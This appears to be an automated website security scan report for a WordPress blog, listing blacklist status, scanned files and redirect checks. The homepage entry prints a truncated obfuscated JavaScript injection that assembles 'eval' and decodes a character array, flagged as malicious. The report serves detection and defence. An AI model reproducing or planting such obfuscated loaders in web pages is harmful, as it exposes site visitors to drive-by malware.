Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=totallyblowingit.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://totallyblowingit.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://totallyblowingit.com/ | 200 OK Content-Length: 22872 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{document.body--}catch(gdsgd){ww=window;v="v"+"al";if(ww.document)try{document.body=12;}catch(gdsgsdg){asd=0;try{q=document.createElement("div");}catch(q){asd=1;}if(!asd){w={a:ww}.a;v="e".concat(v);}}e=w[v];if(1){f=new Array(102,116,108,96,116,104,109,107,32,102,112,94,40,96,42,95,41,122,112,98,116,116,112,107,32,76,95,113,104,45,100,105,111,110,112,37,77,96,114,101,46,113,95,107,100,110,107,37,41,41,38,95,45,96,41,46,41,40,41,94,59,124,11,7,102,116,108,96,116,104,109,107,32,113,113,37,41,122 Antivirus reports:
| ||
http://totallyblowingit.com/wp-content/themes/modularity-lite/js/jquery-1.2.6.min.js | 200 OK Content-Length: 55774 Content-Type: application/x-javascript | clean |
http://totallyblowingit.com/wp-content/themes/modularity-lite/js/nav.js | 200 OK Content-Length: 1185 Content-Type: application/x-javascript | clean |
http://totallyblowingit.com/wp-content/themes/modularity-lite/js/search.js | 200 OK Content-Length: 774 Content-Type: application/x-javascript | clean |
http://stats.wordpress.com/e-201440.js | 200 OK Content-Length: 824 Content-Type: application/x-javascript | clean |
http://totallyblowingit.com/?cat=35 | 200 OK Content-Length: 14091 Content-Type: text/html | clean |
http://totallyblowingit.com/?cat=37 | 200 OK Content-Length: 13803 Content-Type: text/html | clean |
http://totallyblowingit.com/?cat=36 | 200 OK Content-Length: 13716 Content-Type: text/html | clean |
http://totallyblowingit.com/?cat=34 | 200 OK Content-Length: 13875 Content-Type: text/html | clean |
http://totallyblowingit.com/?page_id=2 | 200 OK Content-Length: 13631 Content-Type: text/html | clean |
http://totallyblowingit.com/?feed=rss2 | 200 OK Content-Length: 8624 Content-Type: text/xml | clean |
http://totallyblowingit.com/wp-content/uploads/2010/02/chainsawchips.jpg | 200 OK Content-Length: 155658 Content-Type: image/jpeg | clean |
http://totallyblowingit.com/test404page.js | 404 Not Found Content-Length: 401 Content-Type: text/html | clean |
http://totallyblowingit.com/wp-content/uploads/2010/02/shorebreak.slam_.tbi_.gif | 200 OK Content-Length: 300937 Content-Type: image/gif | clean |
http://totallyblowingit.com/wp-content/uploads/2010/02/pebblebeachfucker.gif | 200 OK Content-Length: 300939 Content-Type: image/gif | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: totallyblowingit.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Oct 2014 16:18:31 GMT
Server: Apache
Content-Type: text/html; charset=UTF-8
Link: <http://wp.me/Phpk>; rel=shortlink
Set-Cookie: __utmfr=726; expires=Wed, 08-Oct-2014 16:18:34 GMT; path=/
X-Pingback: http://totallyblowingit.com/xmlrpc.php
GET / HTTP/1.1
Host: totallyblowingit.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Oct 2014 16:18:31 GMT
Server: Apache
Content-Type: text/html; charset=UTF-8
Link: <http://wp.me/Phpk>; rel=shortlink
Set-Cookie: __utmfr=726; expires=Wed, 08-Oct-2014 16:18:34 GMT; path=/
X-Pingback: http://totallyblowingit.com/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: totallyblowingit.com
Referer: http://www.google.com/search?q=totallyblowingit.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: totallyblowingit.com
Referer: http://www.google.com/search?q=totallyblowingit.com
Result:
The result is similar to the first query. There are no suspicious redirects found.